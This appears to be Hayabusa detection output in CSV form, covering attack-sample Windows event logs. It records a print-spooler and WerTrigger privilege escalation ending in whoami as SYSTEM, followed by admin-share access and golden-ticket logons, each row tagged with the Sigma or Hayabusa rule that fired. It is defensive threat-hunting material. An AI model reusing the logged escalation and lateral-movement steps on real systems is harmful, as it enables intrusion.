2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTYRES.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTY.INI | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTY.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTYUI.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTYUI.HLP | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\UNIRES.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.602 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\STDNAMES.GPD | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.602 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\STDDTYPE.GDL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.603 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\STDSCHEM.GDL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.603 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\STDSCHMX.GDL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.622 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\Old\1 | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.949 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.949 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\blah\blah\phoneinfo.dll | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.949 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Suspicious Print Port | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ports\c:\blah\blah\phoneinfo.dll: (Empty) | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:28.509 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\PRINTERS\00002.SPL | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2532 | PGUID: 747F3D96-E8D1-5F33-0000-001007B63A00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:28.509 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\PRINTERS\00002.SHD | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:28.521 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\PRINTERS\00002.SHD | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:05:19.719 +09:00,MSEDGEWIN10,4,info,,Sysmon Service State Changed,State: Started | SchemaVersion: 4.23,rules/hayabusa/sysmon/events/4_SysmonServiceStateChanged.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:05:20.029 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat"""" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | LID: 0x3e7 | PID: 1740 | PGUID: 747F3D96-E90A-5F33-0000-0010863C0100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:05:20.378 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3320 | PGUID: 747F3D96-E90C-5F33-0000-0010CB420200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:05:20.378 +09:00,MSEDGEWIN10,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:05:36.555 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x41c24 | PID: 5128 | PGUID: 747F3D96-E920-5F33-0000-001043920A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:05:38.260 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c reg query ""HKLM\Software\WOW6432Node\Npcap"" /ve 2>nul | find ""REG_SZ"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat"""" | LID: 0x3e7 | PID: 6952 | PGUID: 747F3D96-E922-5F33-0000-00107A2B0B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:05:38.260 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:05:45.570 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\Explorer.EXE | Tgt Process: C:\Program Files (x86)\FileZilla Server\FileZilla Server Interface.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 5144 | Src PGUID: 747F3D96-E914-5F33-0000-001009990500 | Tgt PID: 7480 | Tgt PGUID: 747F3D96-E928-5F33-0000-0010B8330D00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.exe /c rmdir /s/q C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: WerTrigger.exe | LID: 0x41c24 | PID: 7836 | PGUID: 747F3D96-E938-5F33-0000-00101CA50E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,high,,Parent in Public Folder Suspicious Process,,rules/sigma/process_creation/proc_creation_win_public_folder_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,low,Evas,Windows Cmd Delete File,,rules/sigma/process_creation/proc_creation_win_cmd_delete.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:01.637 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c mkdir,C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: WerTrigger.exe | LID: 0x41c24 | PID: 7852 | PGUID: 747F3D96-E939-5F33-0000-0010ACAB0E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:01.637 +09:00,MSEDGEWIN10,1,high,,Parent in Public Folder Suspicious Process,,rules/sigma/process_creation/proc_creation_win_public_folder_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:02.552 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.exe /c copy Report.wer C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: WerTrigger.exe | LID: 0x41c24 | PID: 7868 | PGUID: 747F3D96-E93A-5F33-0000-001014B30E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:02.552 +09:00,MSEDGEWIN10,1,high,,Parent in Public Folder Suspicious Process,,rules/sigma/process_creation/proc_creation_win_public_folder_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:02.552 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:03.487 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c schtasks /run /TN ""Microsoft\Windows\Windows Error Reporting\QueueReporting"" > nul 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: WerTrigger.exe | LID: 0x41c24 | PID: 7888 | PGUID: 747F3D96-E93B-5F33-0000-0010C1B40E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:03.487 +09:00,MSEDGEWIN10,1,high,,Parent in Public Folder Suspicious Process,,rules/sigma/process_creation/proc_creation_win_public_folder_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:03.487 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:04.075 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\wermgr.exe -upload | LID: 0x3e7 | PID: 8032 | PGUID: 747F3D96-E93C-5F33-0000-0010A6F00E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x3e7 | PID: 7460 | PGUID: 747F3D96-E940-5F33-0000-001039310F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-21 00:35:28.503 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: hack-admu-test1 | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.23.9 | LID: 0x2275e86d,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
2020-08-21 00:36:32.382 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x2276a30d,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
2020-08-21 00:36:32.391 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x2276a30d,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
2020-08-21 00:37:06.186 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x2276ac17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
2020-08-21 00:37:14.331 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x2276ac17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
2020-08-21 00:37:17.039 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x2276b0af,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
2020-08-21 00:37:35.319 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x2276b0af,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
2020-08-21 00:37:35.773 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: JUMP01$ | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x2276b890,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
2020-08-21 00:38:23.185 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: not_existing_user | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.23.9 | LID: 0x2276d109,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx
2020-08-21 00:39:15.820 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x2276ac17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx
2020-08-21 00:41:58.884 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: not_existing_user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b90e2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
2020-08-21 00:42:54.177 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9a72,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
2020-08-21 00:42:54.177 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9a8f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
2020-08-21 00:42:54.193 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9aa3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
2020-08-21 00:42:54.193 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9ab2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
2020-08-21 00:42:55.188 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9b27,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
2020-08-21 00:43:04.967 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9e04,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119ba401,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119ba414,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119ba427,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
2020-08-25 18:58:51.434 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\{17A6A947-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db | Process: C:\Windows\system32\LogonUI.exe | PID: 8500 | PGUID: 747F3D96-E0DA-5F44-0000-0010B3299600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
2020-08-25 19:02:32.697 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\pagefile.sys | Process: C:\Windows\System32\smss.exe | PID: 308 | PGUID: 747F3D96-6039-5F45-0000-00107B2F0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
